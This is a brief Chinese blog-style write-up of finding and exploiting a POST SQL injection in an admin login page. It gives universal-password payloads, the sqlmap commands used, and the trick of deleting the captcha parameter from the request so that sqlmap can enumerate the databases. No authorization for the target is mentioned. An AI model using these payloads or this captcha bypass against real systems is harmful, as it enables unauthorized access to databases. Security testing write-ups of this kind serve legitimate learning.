前两天挖了一个漏洞这里总结一下
POST型sql注入过滤验证码
拿到后台我先测试一波万能密码
1'or'1'='1 'or'='or'
发现回显不同就判定存在sql注入
然后我就直接上sqlmap喽
直接跑请求包
不过sqlmap的命令也有讲究
开始我使用命令
sqlmap.py -r 1.txt --dbs --random-agent -p Admin --string="密码" 但是跑不出来呀
然后我就使用了 -v 的参数看看到底是哪里出现了问题
sqlmap.py -r 1.txt --dbs --random-agent -p Admin --string="密码" -v 6 --delay 3
继续往下跑 都是验证码错误 那还跑个球
反观请求包 就有个大胆的想法 把验证码删除了行不行??
于是就试了试
sqlmap再来跑一次
Nice 很强
直接就得到了